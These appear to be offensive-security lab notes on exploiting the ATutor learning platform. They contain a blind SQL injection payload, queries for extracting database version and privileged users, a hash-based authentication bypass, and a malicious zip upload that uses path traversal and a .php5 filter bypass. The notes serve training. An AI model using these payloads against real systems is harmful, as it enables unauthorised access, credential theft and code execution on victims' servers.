Search for vulnerabilities in unauthenticated flow
Determine inference-based SQL injection
Determine failure of input sanitization
Locate authentication bypass issue
Extract password hash to bypass authentication
Create and upload malicious zip file
Use grep to locate source of error message
```bash (database logging for MySQL) sudo nano /etc/mysql/my.cnf sudo systemctl restart mysql sudo tail –f /var/log/mysql/mysql.log
```bash (php display errors)
sudo nano /etc/php5/apache2/php.ini
# display_errors = On
sudo systemctl restart apache2
```bash (unauthenticated flow) grep -rnw /var/www/html/ATutor -e “^.user_location.public.” –color grep -rnw /var/www/html/ATutor -e “function searchFriends” –color grep -rnw /var/www/html/ATutor -e “$addslashes.=” –color
# for beauifulsoup xml parser or replace with html.parser
pip install bs4 lxml ``` Inference-based SQL Injection ```php
# improper use of $addslashes input validation
if ( get_magic_quotes_gpc() == 1 ) {} # magic quotes for preventing sqli deprecated since 5.4.0 and not enabled by default
$addslashes = 'trim'; # temporary hack
# improper use of parameterization
$sql = create_sql($query, $params, $sanitize); # in queryDB(), $sanitize params but not string concatenated query string
# bypassing string explode
$sub_names = explode(' ', $name); # use inline comments /**/ instead of ' ' ``` ```bash
# url-encode sensitive characters like # and ?
python ATutor-1.py 192.168.127.103 "off')/**/OR/**/(SELECT/**/1)=0%23" # initial payload
python ATutor-2.py 192.168.127.103 # verify boolean based sqli
python ATutor-3.py 192.168.127.103 # enumerate mysql version ``` Extract Sensitive Information ```sql
select/**/version();
select/**/(substring((select/**/version()),1,1))='4'; # boolean based TRUE/FALSE
select/**/ascii(substring((select/**/version()),1,1))='52'; # ascii - printable set 32 - 126
select user from (select user() as user UNION ALL SELECT replace(grantee,'\'','') as user FROM information_schema.user_privileges WHERE privilege_type = "super") temp group by user having count(*) > 1; # retrieve dba
select count(*) from (SELECT replace(grantee,'\'','') as user FROM information_schema.user_privileges WHERE privilege_type = "super" UNION select user() as user) temp group by user; ``` Authentication Bypass ```php
# search for login functionality in login.php and login_functions.inc.php
$_SESSION['token'] = $_POST['token']; # control over salt token for password
WHERE (login='$this_login' OR email='$this_login') AND SHA1(CONCAT(password,$_SESSION['token']))='$this_password' # password is SHA1 concatenation of password and token salt
function encrypt_password() {
document.form.form_password_hidden.value = hex_sha1(hex_sha1(document.form.form_password.value) + "<?php echo $_SESSION['token']; ?>"); ...} # double hashing in login (single hash with existing hash in MySQL database) ``` Malicious Zip File Upload ```bash
grep -ir "IMS manifest file is missing" /var/www/html/ATutor --color # search for error message
grep -ir "addError(" /var/www/html/ATutor --color # determine error message types
grep -rnw /var/www/html/ATutor -e "NO_IMSMANIFEST" --color # locate error in code and adjust zip payload accordingly
# use zipfile and cStringIO => StringIO to create python poc
sudo find / -name poc.txt # observe the location of uploaded file
sudo find / -name poc.php5 # bypass php extension filter ``` Directory Traversal ```php
z.writestr('../../../../../tmp/poc/poc.txt', 'offsec') # traverse to /tmp directory
# trigger a php error warning (through display_errors) in black box to disclose web root ``` ```bash
find /var/www/html/ -type d -perm -o+w # find writable directories in web root ```